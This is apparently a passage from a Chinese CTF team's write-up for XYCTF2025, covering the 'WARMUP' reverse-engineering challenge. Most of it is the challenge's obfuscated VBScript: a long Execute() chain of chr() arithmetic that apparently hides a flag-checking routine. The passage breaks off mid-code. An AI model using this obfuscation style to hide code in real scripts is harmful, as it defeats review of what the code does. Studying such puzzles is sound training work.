XYCTF2025 广职信安一队 wp

2025-04-06


最终排名为33名共806队(只计算有分的队伍)

RE

WARMUP

用脚本计算每个 chr() 中的算术表达式,并将结果转换为对应的 ASCII 字符,可得

import re
vbs_code = """

Execute(chr( 667205/8665 ) & chr( -7671+7786 ) & chr( 8541-8438 ) & chr( 422928/6408 ) & chr( -1948+2059 ) & chr( -3066+3186 ) & chr( 756-724 ) & chr( 4080/120 ) & chr( -3615+3683 ) & chr( -1619+1720 ) & chr( -2679+2776 ) & chr( 659718/5787 ) & chr( 302752/9461 ) & chr( -6627+6694 ) & chr( -4261+4345 ) & chr( 81690/1167 ) & chr( 636180/9220 ) & chr( 538658/6569 ) & chr( -1542+1588 ) & chr( -1644+1676 ) & chr( 122184/1697 ) & chr( 966411/9963 ) & chr( 2186-2068 ) & chr( -5283+5384 ) & chr( 305056/9533 ) & chr( 66402/651 ) & chr( 1141452/9756 ) & chr( 882090/8019 ) & chr( -4243+4275 ) & chr( 2669-2564 ) & chr( 83+27 ) & chr( 254880/7965 ) & chr( -1291+1379 ) & chr( -4699+4788 ) & chr( 4730-4663 ) & chr( -1179+1263 ) & chr( 5274-5204 ) & chr( 210144/6567 ) & chr( -6803+6853 ) & chr( 6655-6607 ) & chr( 4067-4017 ) & chr( 121900/2300 ) & chr( -6158+6191 ) & chr( 11934/351 ) & chr( 64883/4991 ) & chr( 65420/6542 ) & chr( 3781-3679 ) & chr( 1612-1504 ) & chr( 892788/9204 ) & chr( 927618/9006 ) & chr( -6692+6724 ) & chr( 410591/6731 ) & chr( 6675-6643 ) & chr( 697880/9560 ) & chr( 4250-4140 ) & chr( 5464-5352 ) & chr( -1082+1199 ) & chr( 3343-3227 ) & chr( 1211-1145 ) & chr( 482406/4346 ) & chr( -5549+5669 ) & chr( -5150+5190 ) & chr( 4400-4366 ) & chr( -3277+3346 ) & chr( -6649+6759 ) & chr( -5669+5785 ) & chr( -6734+6835 ) & chr( 9757-9643 ) & chr( 109-77 ) & chr( 5620-5504 ) & chr( -2887+2991 ) & chr( -3081+3182 ) & chr( -5109+5141 ) & chr( 699860/9998 ) & chr( -3603+3679 ) & chr( 1631-1566 ) & chr( 445-374 ) & chr( 294118/5071 ) & chr( -1115+1149 ) & chr( 222376/5054 ) & chr( 8137-8105 ) & chr( -1653+1687 ) & chr( 357104/4058 ) & chr( 1650-1561 ) & chr( -9501+9568 ) & chr( 1047-963 ) & chr( 2540-2470 ) & chr( 1692-1658 ) & chr( 9947-9906 ) & chr( 9186-9173 ) & chr( -2846+2856 ) & chr( 425187/3573 ) & chr( -3066+3167 ) & chr( 2850-2748 ) & chr( -2992+3090 ) & chr( 958230/8190 ) & chr( 869295/7305 ) & chr( 3380-3275 ) & chr( -7338+7455 ) & chr( 408848/4048 ) & chr( 
9211-9179 ) & chr( -2437+2498 ) & chr( 1672-1640 ) & chr( 2378-2344 ) & chr( 544749/9557 ) & chr( 351120/7315 ) & chr( 773800/7738 ) & chr( 2033-1931 ) & chr( -8059+8111 ) & chr( -4731+4783 ) & chr( -9204+9252 ) & chr( -4261+4316 ) & chr( 850521/8421 ) & chr( -7011+7112 ) & chr( 292272/6089 ) & chr( -8609+8666 ) & chr( -2921+2972 ) & chr( 6772-6672 ) & chr( 487611/9561 ) & chr( -6754+6802 ) & chr( 464835/8155 ) & chr( -939+987 ) & chr( 421173/7389 ) & chr( -8145+8201 ) & chr( 9368-9268 ) & chr( -7682+7738 ) & chr( -8646+8699 ) & chr( 484612/4996 ) & chr( 286832/5516 ) & chr( -9710+9760 ) & chr( 884156/9022 ) & chr( 7080-6979 ) & chr( 265477/5009 ) & chr( 6+49 ) & chr( 5395-5298 ) & chr( 6645-6595 ) & chr( -9706+9763 ) & chr( -6697+6752 ) & chr( 927-870 ) & chr( 4048-3946 ) & chr( 34398/702 ) & chr( 825675/8175 ) & chr( -438+491 ) & chr( 87808/1792 ) & chr( -2601+2653 ) & chr( 420228/7782 ) & chr( -5266+5317 ) & chr( 53059/547 ) & chr( 477054/9354 ) & chr( 9238-9189 ) & chr( 799112/7912 ) & chr( 3340-3284 ) & chr( 8544-8444 ) & chr( 1220-1171 ) & chr( -7192+7245 ) & chr( 73629/729 ) & chr( 6523-6473 ) & chr( 2761-2659 ) & chr( 358124/3692 ) & chr( -6167+6266 ) & chr( -3842+3894 ) & chr( 7840-7739 ) & chr( -3980+4036 ) & chr( 987-935 ) & chr( 6868/68 ) & chr( -559+656 ) & chr( 6513-6465 ) & chr( 843300/8433 ) & chr( -8159+8261 ) & chr( -753+807 ) & chr( 278700/5574 ) & chr( 5600/112 ) & chr( -549+646 ) & chr( -7697+7750 ) & chr( 390292/7364 ) & chr( 988020/9980 ) & chr( -3250+3302 ) & chr( 6295-6195 ) & chr( 4342-4242 ) & chr( -9602+9704 ) & chr( 1312-1214 ) & chr( 1065-1012 ) & chr( 1122/22 ) & chr( 191012/3604 ) & chr( 330775/3275 ) & chr( 226848/2224 ) & chr( 4973-4922 ) & chr( 369357/3657 ) & chr( -7229+7282 ) & chr( 588/12 ) & chr( 57570/570 ) & chr( 4554-4498 ) & chr( 483924/4938 ) & chr( 485600/9712 ) & chr( 5051-4998 ) & chr( 8467-8417 ) & chr( -6799+6855 ) & chr( 668360/6820 ) & chr( 428008/7643 ) & chr( -309+359 ) & chr( -7495+7549 ) & chr( 198200/1982 ) & 
chr( -4298+4351 ) & chr( 2979-2928 ) & chr( -391+443 ) & chr( -5951+6006 ) & chr( -2271+2372 ) & chr( 1431-1382 ) & chr( -2812+2866 ) & chr( 4906-4853 ) & chr( -5308+5365 ) & chr( -8587+8636 ) & chr( -1003+1053 ) & chr( 468741/4641 ) & chr( 8449-8392 ) & chr( 14877/261 ) & chr( -5097+5146 ) & chr( 6695-6646 ) & chr( -2866+2922 ) & chr( 483786/9486 ) & chr( -4142+4193 ) & chr( 2347-2296 ) & chr( -1784+1833 ) & chr( 116229/2193 ) & chr( -1099+1148 ) & chr( 8230-8180 ) & chr( -4351+4406 ) & chr( 1975-1924 ) & chr( 779229/7871 ) & chr( 102960/1040 ) & chr( 67830/1330 ) & chr( -4771+4873 ) & chr( -32+129 ) & chr( 155456/2776 ) & chr( 9798-9700 ) & chr( 4944-4894 ) & chr( -2496+2594 ) & chr( 5495-5444 ) & chr( 8113-8015 ) & chr( -8444+8496 ) & chr( 3896-3847 ) & chr( 6306-6255 ) & chr( 1284-1185 ) & chr( 1003986/9843 ) & chr( -1321+1371 ) & chr( 2676-2578 ) & chr( -5421+5521 ) & chr( 564186/5757 ) & chr( 6608-6559 ) & chr( 7038-6937 ) & chr( 209720/3745 ) & chr( -616+715 ) & chr( 9766-9709 ) & chr( 2111-2012 ) & chr( 528993/9981 ) & chr( 1901-1851 ) & chr( 281344/5024 ) & chr( 5695-5641 ) & chr( 4815-4762 ) & chr( 399556/3956 ) & chr( 572730/5615 ) & chr( -5718+5817 ) & chr( 21+27 ) & chr( 4532-4475 ) & chr( -8446+8499 ) & chr( 5786-5689 ) & chr( 4177-4121 ) & chr( -8411+8511 ) & chr( -9499+9599 ) & chr( 479528/8563 ) & chr( 6850-6793 ) & chr( -3725+3823 ) & chr( -8692+8743 ) & chr( 284298/2901 ) & chr( 214302/4202 ) & chr( 576675/5825 ) & chr( -4565+4667 ) & chr( -7223+7321 ) & chr( 383278/3911 ) & chr( -2540+2590 ) & chr( 35+13 ) & chr( -5549+5597 ) & chr( 969122/9889 ) & chr( 964712/9844 ) & chr( -6231+6328 ) & chr( -1560+1660 ) & chr( -7416+7514 ) & chr( 609144/5972 ) & chr( 471432/9066 ) & chr( -4500+4597 ) & chr( 8620-8566 ) & chr( 7113-7014 ) & chr( -2488+2588 ) & chr( -3599+3651 ) & chr( 211956/6234 ) & chr( 1697-1665 ) & chr( -5122+5161 ) & chr( -3189+3221 ) & chr( -5840+114 ) & chr( -37790+6278 ) & chr( -8.231351E+07/3957 ) & chr( -14110+7864 ) & chr( 
-30457-1205 ) & chr( 9930-9863 ) & chr( 107-55 ) & chr( 517-7291 ) & chr( -31263+6916 ) & chr( -29685+9083 ) & chr( -2.138515E+07/3442 ) & chr( -26304-1370 ) & chr( -1.510879E+08/6060 ) & chr( -903-3261 ) & chr( -22484-8007 ) & chr( -34437+5126 ) & chr( -10635+3856 ) & chr( -1.97004E+08/9374 ) & chr( -1.079768E+08/6550 ) & chr( -2.533546E+07/3739 ) & chr( -25645+6931 ) & chr( -1.720817E+08/7056 ) & chr( -12498+5774 ) & chr( -2.164872E+08/7546 ) & chr( -8955-8316 ) & chr( -3584+3597 ) & chr( -1280+1290 ) & chr( 795633/7041 ) & chr( 291669/2451 ) & chr( 9044-8942 ) & chr( 264014/2614 ) & chr( -7841+7873 ) & chr( 10919/179 ) & chr( 22272/696 ) & chr( -8135+8169 ) & chr( -5733+5847 ) & chr( 371547/3753 ) & chr( 473980/9115 ) & chr( 391-284 ) & chr( -1824+1925 ) & chr( -1707+1828 ) & chr( 2151-2117 ) & chr( 2535/195 ) & chr( 7236-7226 ) & chr( 58097/4469 ) & chr( 2710/271 ) & chr( 118677/3043 ) & chr( -7992+8024 ) & chr( -5.682766E+07/8145 ) & chr( -3.747722E+07/1805 ) & chr( -20535-2876 ) & chr( -5076000/750 ) & chr( -28220-733 ) & chr( -33583+7603 ) & chr( 7730-7648 ) & chr( 7057-6990 ) & chr( 338728/6514 ) & chr( -4.203267E+07/6205 ) & chr( -20128-4219 ) & chr( -29090+8488 ) & chr( -7954+1177 ) & chr( -25730+8808 ) & chr( -23859-3357 ) & chr( -2130+2143 ) & chr( 6827-6817 ) & chr( 4334-4264 ) & chr( 4851-4734 ) & chr( 5121-5011 ) & chr( 7034-6935 ) & chr( 4197-4081 ) & chr( -1823+1928 ) & chr( 1032744/9304 ) & chr( 1547-1437 ) & chr( -7393+7425 ) & chr( 608932/7426 ) & chr( 864513/7389 ) & chr( 1748-1638 ) & chr( 501676/6118 ) & chr( 510473/7619 ) & chr( -6752+6792 ) & chr( -5142+5257 ) & chr( -9558+9635 ) & chr( 7906-7805 ) & chr( 5308-5193 ) & chr( 163300/1420 ) & chr( 10961/113 ) & chr( 740364/7188 ) & chr( -5327+5428 ) & chr( 5703-5659 ) & chr( -7307+7339 ) & chr( 445970/3878 ) & chr( 608-492 ) & chr( -4799+4913 ) & chr( -3687+3762 ) & chr( 9993-9892 ) & chr( 1032493/8533 ) & chr( 103607/2527 ) & chr( 123266/9482 ) & chr( 61520/6152 ) & chr( 251424/7857 ) & chr( 
104032/3251 ) & chr( -7228+7260 ) & chr( 239648/7489 ) & chr( -1858+1926 ) & chr( 865515/8243 ) & chr( 818481/7509 ) & chr( 244384/7637 ) & chr( -4252+4359 ) & chr( 10+66 ) & chr( -3202+3303 ) & chr( 466070/4237 ) & chr( 3973-3929 ) & chr( -7658+7690 ) & chr( 563430/5366 ) & chr( 168872/3838 ) & chr( 306144/9567 ) & chr( 158046/1491 ) & chr( 311740/7085 ) & chr( -6862+6894 ) & chr( 621760/5360 ) & chr( -8151+8252 ) & chr( 9608-9499 ) & chr( 309680/2765 ) & chr( 244288/5552 ) & chr( 6191-6159 ) & chr( 705936/6303 ) & chr( 4828-4717 ) & chr( 1097330/9542 ) & chr( 431596/9809 ) & chr( -8819+8851 ) & chr( 546675/4925 ) & chr( 805545/6885 ) & chr( -5087+5203 ) & chr( 1223-1151 ) & chr( 9566-9465 ) & chr( 2413-2293 ) & chr( 4760-4747 ) & chr( -4859+4869 ) & chr( 3357-3325 ) & chr( 667-635 ) & chr( -2223+2255 ) & chr( 4357-4325 ) & chr( 366928/5396 ) & chr( 203175/1935 ) & chr( -7837+7946 ) & chr( 47936/1498 ) & chr( 3589-3474 ) & chr( 254920/6373 ) & chr( 3498-3448 ) & chr( 54113/1021 ) & chr( 9319-9266 ) & chr( 380767/9287 ) & chr( 298804/6791 ) & chr( -5151+5183 ) & chr( 3487-3380 ) & chr( 246760/6169 ) & chr( 7465-7415 ) & chr( -8879+8932 ) & chr( -281+334 ) & chr( 314470/7670 ) & chr( -1151+1164 ) & chr( 4880-4870 ) & chr( 3582-3550 ) & chr( 147008/4594 ) & chr( 169248/5289 ) & chr( -8224+8256 ) & chr( 4654/358 ) & chr( -2894+2904 ) & chr( 3479-3447 ) & chr( 2036-2004 ) & chr( 7024-6992 ) & chr( -8686+8718 ) & chr( -664+703 ) & chr( 53952/1686 ) & chr( -10371+3595 ) & chr( -21805-3310 ) & chr( -1.930486E+08/8525 ) & chr( -6242-530 ) & chr( -2.479211E+08/9214 ) & chr( -28712+8110 ) & chr( 4047-9789 ) & chr( 278397/4419 ) & chr( -6794+6804 ) & chr( 310624/9707 ) & chr( 120896/3778 ) & chr( 6925-6893 ) & chr( 8256-8224 ) & chr( -4736+4843 ) & chr( 1256-1180 ) & chr( 4250-4149 ) & chr( -9132+9242 ) & chr( 173344/5417 ) & chr( -9030+9091 ) & chr( 72-40 ) & chr( 344204/4529 ) & chr( 351985/3485 ) & chr( 6120-6010 ) & chr( 1113-1073 ) & chr( 2781-2666 ) & chr( 6375-6259 ) & 
chr( 780330/6845 ) & chr( 106050/1414 ) & chr( 1239-1138 ) & chr( -986+1107 ) & chr( 324351/7911 ) & chr( -7872+7885 ) & chr( -1326+1336 ) & chr( 17728/554 ) & chr( 61600/1925 ) & chr( -4930+4962 ) & chr( 113856/3558 ) & chr( -7210+7280 ) & chr( 3126-3015 ) & chr( 9894-9780 ) & chr( 2040-2008 ) & chr( 957810/9122 ) & chr( -1680+1712 ) & chr( -7068+7129 ) & chr( -9765+9797 ) & chr( 4121-4073 ) & chr( -9924+9956 ) & chr( -4370+4454 ) & chr( 437340/3940 ) & chr( 5315-5283 ) & chr( 304500/6090 ) & chr( -6807+6860 ) & chr( 19186/362 ) & chr( -6044+6057 ) & chr( 9876-9866 ) & chr( -2071+2103 ) & chr( 8923-8891 ) & chr( 4890-4858 ) & chr( 7473-7441 ) & chr( 5632-5600 ) & chr( 8294-8262 ) & chr( -271+303 ) & chr( 6410-6378 ) & chr( 5536-5421 ) & chr( 44720/1118 ) & chr( 6272-6167 ) & chr( 26568/648 ) & chr( 233440/7295 ) & chr( -8944+9005 ) & chr( 204192/6381 ) & chr( 5731-5626 ) & chr( 9617-9604 ) & chr( 7388-7378 ) & chr( 960/30 ) & chr( 99008/3094 ) & chr( 8422-8390 ) & chr( 19136/598 ) & chr( -6328+6360 ) & chr( 199712/6241 ) & chr( -2315+2347 ) & chr( -6898+6930 ) & chr( 9875-9768 ) & chr( -4621+4661 ) & chr( -7725+7830 ) & chr( -3507+3548 ) & chr( 4844-4812 ) & chr( 570716/9356 ) & chr( -3814+3846 ) & chr( -1467+1532 ) & chr( 138115/1201 ) & chr( -7634+7733 ) & chr( -7021+7061 ) & chr( 942-865 ) & chr( 924630/8806 ) & chr( 8706-8606 ) & chr( -6756+6796 ) & chr( -5325+5440 ) & chr( 2765-2649 ) & chr( -7079+7193 ) & chr( 2100/28 ) & chr( 8156-8055 ) & chr( -7792+7913 ) & chr( 5324/121 ) & chr( 6423-6391 ) & chr( 5454-5414 ) & chr( -4828+4933 ) & chr( 13504/422 ) & chr( 244552/3176 ) & chr( -3016+3127 ) & chr( -4103+4203 ) & chr( 2567-2535 ) & chr( 435-328 ) & chr( 787-711 ) & chr( 1474-1373 ) & chr( 803550/7305 ) & chr( -5410+5451 ) & chr( -6556+6588 ) & chr( -2204+2247 ) & chr( 223424/6982 ) & chr( -8753+8802 ) & chr( 135872/3088 ) & chr( -7757+7789 ) & chr( 272-223 ) & chr( 340177/8297 ) & chr( 1487-1446 ) & chr( -9083+9115 ) & chr( 7132-7093 ) & chr( 4540-4508 ) & 
chr( -13541+6804 ) & chr( -7.75285E+07/2501 ) & chr( -32055+4060 ) & chr( -1318-5661 ) & chr( -5.265648E+07/3209 ) & chr( -31857+4377 ) & chr( 585065/9001 ) & chr( -2558+2641 ) & chr( -8549+8616 ) & chr( 6403-6330 ) & chr( 6271-6198 ) & chr( -2.477346E+07/3988 ) & chr( -17020-9885 ) & chr( -2542488/104 ) & chr( -1327+1340 ) & chr( -887+897 ) & chr( -7751+7783 ) & chr( 2629-2597 ) & chr( -6489+6521 ) & chr( 2254-2222 ) & chr( 154518/1981 ) & chr( -764+865 ) & chr( 629040/5242 ) & chr( 1098636/9471 ) & chr( 78793/6061 ) & chr( -7110+7120 ) & chr( -7378+7410 ) & chr( -1777+1809 ) & chr( 2538-2506 ) & chr( 119392/3731 ) & chr( -4327+4340 ) & chr( 10580/1058 ) & chr( -7677+7709 ) & chr( 8254-8222 ) & chr( 3782-3750 ) & chr( 214240/6695 ) & chr( 7006-6967 ) & chr( 8305-8273 ) & chr( 4841-4766 ) & chr( 937-854 ) & chr( 616460/9484 ) & chr( -16-6721 ) & chr( -28078-2921 ) & chr( -24670-3325 ) & chr( -9340+3372 ) & chr( -25211-6560 ) & chr( -22908+5154 ) & chr( 6567-6554 ) & chr( -635+645 ) & chr( -5907+5939 ) & chr( 4841-4809 ) & chr( 20576/643 ) & chr( -2196+2228 ) & chr( 3270-3164 ) & chr( 212384/6637 ) & chr( 509533/8353 ) & chr( 94368/2949 ) & chr( -1648+1696 ) & chr( 23335/1795 ) & chr( -86+96 ) & chr( 209408/6544 ) & chr( 5186-5154 ) & chr( 91072/2846 ) & chr( 8978-8946 ) & chr( 45850/655 ) & chr( 256632/2312 ) & chr( -8647+8761 ) & chr( 5661-5629 ) & chr( 191940/1828 ) & chr( 2132-2100 ) & chr( -9855+9916 ) & chr( 3562-3530 ) & chr( 24864/518 ) & chr( 275424/8607 ) & chr( 3176-3092 ) & chr( 3798-3687 ) & chr( -6055+6087 ) & chr( -6024+6074 ) & chr( -6425+6478 ) & chr( -9745+9798 ) & chr( 23387/1799 ) & chr( -3891+3901 ) & chr( -4637+4669 ) & chr( -3183+3215 ) & chr( 9860-9828 ) & chr( 1677-1645 ) & chr( 3698-3666 ) & chr( -7915+7947 ) & chr( 200128/6254 ) & chr( -3984+4016 ) & chr( 5982-5876 ) & chr( -5627+5659 ) & chr( 6122-6061 ) & chr( -5851+5883 ) & chr( 204520/5113 ) & chr( -566+672 ) & chr( 260512/8141 ) & chr( 7314-7271 ) & chr( -1563+1595 ) & chr( 5079-4964 
) & chr( 11680/292 ) & chr( 8464-8359 ) & chr( 6991-6950 ) & chr( -3136+3168 ) & chr( 4262-4219 ) & chr( 4518-4486 ) & chr( 9317-9210 ) & chr( 7615-7575 ) & chr( 55650/530 ) & chr( 1185-1144 ) & chr( 7853-7812 ) & chr( -3099+3131 ) & chr( 288288/3744 ) & chr( -8871+8982 ) & chr( -8502+8602 ) & chr( 2470-2438 ) & chr( 364100/7282 ) & chr( -8754+8807 ) & chr( 476874/8831 ) & chr( 768-755 ) & chr( 8485-8475 ) & chr( -6548+6580 ) & chr( 68960/2155 ) & chr( 31904/997 ) & chr( 113792/3556 ) & chr( -8387+8419 ) & chr( 116448/3639 ) & chr( 279552/8736 ) & chr( -2637+2669 ) & chr( -5483+5599 ) & chr( 4853-4752 ) & chr( -7090+7199 ) & chr( 544320/4860 ) & chr( 305600/9550 ) & chr( 510570/8370 ) & chr( 72640/2270 ) & chr( 3200-3085 ) & chr( -6820+6860 ) & chr( 396375/3775 ) & chr( -7447+7488 ) & chr( -9189+9202 ) & chr( -4261+4271 ) & chr( 1688-1656 ) & chr( 9083-9051 ) & chr( 9012-8980 ) & chr( -3650+3682 ) & chr( 291424/9107 ) & chr( 842-810 ) & chr( -7058+7090 ) & chr( -7119+7151 ) & chr( -4515+4630 ) & chr( 9315-9275 ) & chr( 2216-2111 ) & chr( -1847+1888 ) & chr( 100192/3131 ) & chr( 8671-8610 ) & chr( -1498+1530 ) & chr( 5376-5261 ) & chr( 965-925 ) & chr( 597628/5638 ) & chr( -6697+6738 ) & chr( 9809-9796 ) & chr( 740-730 ) & chr( 4866-4834 ) & chr( 8064-8032 ) & chr( 8204-8172 ) & chr( 6706-6674 ) & chr( -3302+3334 ) & chr( -9585+9617 ) & chr( 8259-8227 ) & chr( 9319-9287 ) & chr( 6042-5927 ) & chr( -4563+4603 ) & chr( 843124/7954 ) & chr( -468+509 ) & chr( 91-59 ) & chr( 55+6 ) & chr( -470+502 ) & chr( 8800-8684 ) & chr( -732+833 ) & chr( 1859-1750 ) & chr( -9065+9177 ) & chr( -3551+3564 ) & chr( -5998+6008 ) & chr( 309248/9664 ) & chr( 78080/2440 ) & chr( 1337-1305 ) & chr( 1031-999 ) & chr( -2405+2483 ) & chr( 900011/8911 ) & chr( 9591-9471 ) & chr( 3993-3877 ) & chr( 37024/2848 ) & chr( 2372-2362 ) & chr( -1999+2031 ) & chr( 402-370 ) & chr( 2339-2307 ) & chr( 215232/6726 ) & chr( 56706/4362 ) & chr( 88610/8861 ) & chr( 6347-6315 ) & chr( -1057+1089 ) & chr( 
-8215+8247 ) & chr( -5359+5391 ) & chr( 360048/9232 ) & chr( 150208/4694 ) & chr( 549760/6872 ) & chr( 709710/8655 ) & chr( -9253+9324 ) & chr( -1875+1940 ) & chr( 3060-9834 ) & chr( -1.219054E+08/5007 ) & chr( -16837-3765 ) & chr( -13859+7384 ) & chr( -40413+8132 ) & chr( -7.735399E+07/3455 ) & chr( -3620+3633 ) & chr( 7370/737 ) & chr( 9207-9175 ) & chr( 21216/663 ) & chr( -8881+8913 ) & chr( 59712/1866 ) & chr( 1881-1776 ) & chr( 5987-5955 ) & chr( 213378/3498 ) & chr( 185536/5798 ) & chr( -1106+1154 ) & chr( -6274+6306 ) & chr( 244-186 ) & chr( -7680+7712 ) & chr( 417216/3936 ) & chr( 1383-1351 ) & chr( 346419/5679 ) & chr( -7913+7945 ) & chr( 3201-3153 ) & chr( 268160/8380 ) & chr( -5532+5590 ) & chr( -6959+6991 ) & chr( 3356-3245 ) & chr( -7222+7339 ) & chr( 9549-9433 ) & chr( -426+498 ) & chr( 510555/5055 ) & chr( 699720/5831 ) & chr( -5601+5633 ) & chr( 260653/4273 ) & chr( 26752/836 ) & chr( 4148-4114 ) & chr( -6483+6517 ) & chr( 120601/9277 ) & chr( 92430/9243 ) & chr( 3296/103 ) & chr( 3355-3323 ) & chr( 6661-6629 ) & chr( -309+341 ) & chr( -4300+4370 ) & chr( 132090/1190 ) & chr( 296742/2603 ) & chr( -568+600 ) & chr( 576016/5143 ) & chr( 4279-4168 ) & chr( -3514+3629 ) & chr( -7862+7894 ) & chr( 201544/3304 ) & chr( 6720/210 ) & chr( -1246+1295 ) & chr( 6539-6507 ) & chr( 7479-7395 ) & chr( 685536/6176 ) & chr( -7312+7344 ) & chr( -2052+2128 ) & chr( -8510+8611 ) & chr( 311630/2833 ) & chr( 8715-8675 ) & chr( -6734+6849 ) & chr( -5728+5805 ) & chr( 9955-9854 ) & chr( 269445/2343 ) & chr( -4059+4174 ) & chr( 47142/486 ) & chr( 921-818 ) & chr( 663-562 ) & chr( 164328/4008 ) & chr( 23634/1818 ) & chr( 82110/8211 ) & chr( 5730-5698 ) & chr( 245312/7666 ) & chr( 1656-1624 ) & chr( 269536/8423 ) & chr( 168864/5277 ) & chr( -2835+2867 ) & chr( -9348+9380 ) & chr( 216128/6754 ) & chr( -6873+6978 ) & chr( 8769-8737 ) & chr( -7159+7220 ) & chr( -2374+2406 ) & chr( 145560/3639 ) & chr( 84945/809 ) & chr( 4967-4935 ) & chr( 3533-3490 ) & chr( -8222+8254 ) & chr( 
-5971+6020 ) & chr( 203811/4971 ) & chr( 64768/2024 ) & chr( -8894+8971 ) & chr( -7605+7716 ) & chr( 7530-7430 ) & chr( 8961-8929 ) & chr( 204800/4096 ) & chr( 34291/647 ) & chr( 5124-5070 ) & chr( 117455/9035 ) & chr( 70910/7091 ) & chr( 191072/5971 ) & chr( -8276+8308 ) & chr( 194464/6077 ) & chr( 1606-1574 ) & chr( 200032/6251 ) & chr( -183+215 ) & chr( 7729-7697 ) & chr( -6288+6320 ) & chr( 563-457 ) & chr( 48544/1517 ) & chr( 504-443 ) & chr( -227+259 ) & chr( 358600/8965 ) & chr( 5705-5599 ) & chr( -4736+4768 ) & chr( 321554/7478 ) & chr( -8525+8557 ) & chr( 402615/3501 ) & chr( 1320/33 ) & chr( 233100/2220 ) & chr( 7463-7422 ) & chr( 8959-8918 ) & chr( 9538-9506 ) & chr( -3809+3886 ) & chr( 17094/154 ) & chr( 3305-3205 ) & chr( 5389-5357 ) & chr( 101450/2029 ) & chr( -2702+2755 ) & chr( 422-368 ) & chr( 3681-3668 ) & chr( 1374-1364 ) & chr( 244192/7631 ) & chr( 2106-2074 ) & chr( 301504/9422 ) & chr( 6788-6756 ) & chr( 275072/8596 ) & chr( -2612+2644 ) & chr( 1544-1512 ) & chr( 263424/8232 ) & chr( 5985-5869 ) & chr( 409555/4055 ) & chr( 7844-7735 ) & chr( 668752/5971 ) & chr( 1110-1078 ) & chr( -880+941 ) & chr( 9828-9796 ) & chr( 610650/5310 ) & chr( -2213+2253 ) & chr( 5697-5592 ) & chr( 340505/8305 ) & chr( 1757-1744 ) & chr( 88340/8834 ) & chr( 2986-2954 ) & chr( -7747+7779 ) & chr( 5952-5920 ) & chr( 6697-6665 ) & chr( 180160/5630 ) & chr( 1671-1639 ) & chr( -8613+8645 ) & chr( 95904/2997 ) & chr( 8994-8879 ) & chr( 7256-7216 ) & chr( -5776+5881 ) & chr( 1529-1488 ) & chr( 179680/5615 ) & chr( -684+745 ) & chr( 119840/3745 ) & chr( 828000/7200 ) & chr( -1371+1411 ) & chr( 2474-2368 ) & chr( 144033/3513 ) & chr( 1617-1604 ) & chr( 9503-9493 ) & chr( -1100+1132 ) & chr( 211680/6615 ) & chr( 7607-7575 ) & chr( 5777-5745 ) & chr( 319712/9991 ) & chr( -9605+9637 ) & chr( 140672/4396 ) & chr( 3740-3708 ) & chr( 92575/805 ) & chr( 9363-9323 ) & chr( 292136/2756 ) & chr( -9536+9577 ) & chr( -9310+9342 ) & chr( 7634-7573 ) & chr( -9716+9748 ) & chr( -7090+7206 
) & chr( 376-275 ) & chr( -6333+6442 ) & chr( 3986-3874 ) & chr( 3115-3102 ) & chr( -2171+2181 ) & chr( 100544/3142 ) & chr( 74-42 ) & chr( -1400+1432 ) & chr( 81504/2547 ) & chr( 5073-5041 ) & chr( 4596-4564 ) & chr( 9048-9016 ) & chr( -2733+2765 ) & chr( -4650+4663 ) & chr( -151+161 ) & chr( 10592/331 ) & chr( 3163-3131 ) & chr( 4722-4690 ) & chr( 30624/957 ) & chr( 2545-2513 ) & chr( 251232/7851 ) & chr( -2926+2958 ) & chr( 239584/7487 ) & chr( 389-350 ) & chr( -2+34 ) & chr( -5.053404E+07/7460 ) & chr( -26034+1687 ) & chr( -19313-1289 ) & chr( -30-6697 ) & chr( -17366-1346 ) & chr( -15077-1903 ) & chr( -6552-432 ) & chr( -13927-3764 ) & chr( -37232+7921 ) & chr( 1107-7886 ) & chr( -15477-5539 ) & chr( -1.750707E+07/1062 ) & chr( -3.826407E+07/5647 ) & chr( 364959/5793 ) & chr( 2034-2024 ) & chr( -7296+7328 ) & chr( -3111+3143 ) & chr( -3156+3188 ) & chr( 7990-7958 ) & chr( 166496/5203 ) & chr( -4151+4183 ) & chr( 4071-4039 ) & chr( 9102-9070 ) & chr( -6166+6234 ) & chr( 283185/2697 ) & chr( 3833-3724 ) & chr( 119776/3743 ) & chr( 658224/5877 ) & chr( 7881-7773 ) & chr( 390328/4024 ) & chr( 8122-8017 ) & chr( 934010/8491 ) & chr( 579751/8653 ) & chr( -8024+8128 ) & chr( 57036/588 ) & chr( 2457-2343 ) & chr( 9781-9737 ) & chr( -5599+5631 ) & chr( -7710+7809 ) & chr( -4501+4606 ) & chr( 625072/5581 ) & chr( 783432/7533 ) & chr( 877488/8688 ) & chr( 6473-6359 ) & chr( 5963-5897 ) & chr( 150282/1242 ) & chr( -9775+9891 ) & chr( -7486+7587 ) & chr( 565-552 ) & chr( 5581-5571 ) & chr( 771-739 ) & chr( 69824/2182 ) & chr( 4603-4571 ) & chr( -5709+5741 ) & chr( 8242-8210 ) & chr( 94112/2941 ) & chr( 100352/3136 ) & chr( -8344+8376 ) & chr( -1824+1936 ) & chr( 6678-6570 ) & chr( 638454/6582 ) & chr( 6614-6509 ) & chr( 1012990/9209 ) & chr( 8744-8677 ) & chr( 561912/5403 ) & chr( 444163/4579 ) & chr( 10089-9975 ) & chr( 280960/8780 ) & chr( 320128/5248 ) & chr( -3399+3431 ) & chr( -1771+1836 ) & chr( 5417-5302 ) & chr( -1824+1923 ) & chr( 212600/5315 ) & chr( -4973+5050 ) 
& chr( 60060/572 ) & chr( 639000/6390 ) & chr( 355520/8888 ) & chr( 866410/7534 ) & chr( 5901-5824 ) & chr( 9869-9768 ) & chr( -4100+4215 ) & chr( 9973-9858 ) & chr( 601594/6202 ) & chr( 857887/8329 ) & chr( -7663+7764 ) & chr( -205+249 ) & chr( -5719+5751 ) & chr( 8618-8506 ) & chr( 822732/7412 ) & chr( 9707-9592 ) & chr( 106832/2428 ) & chr( 1917-1885 ) & chr( 7491-7442 ) & chr( 263507/6427 ) & chr( -3050+3091 ) & chr( 6688/209 ) & chr( 3579-3540 ) & chr( 62400/1950 ) & chr( -5.533603E+07/8508 ) & chr( -1.094461E+07/378 ) & chr( -19198-7803 ) & chr( -1503-5013 ) & chr( -22047-8352 ) & chr( -9364+9447 ) & chr( -3664+3731 ) & chr( 7198-7125 ) & chr( 6274-6201 ) & chr( -16376+9628 ) & chr( -3.882402E+07/1232 ) & chr( -35990+7452 ) & chr( 59020/4540 ) & chr( 32900/3290 ) & chr( 51776/1618 ) & chr( -7782+7814 ) & chr( 9795-9763 ) & chr( 254592/7956 ) & chr( 83520/2610 ) & chr( 7721-7689 ) & chr( -7133+7165 ) & chr( 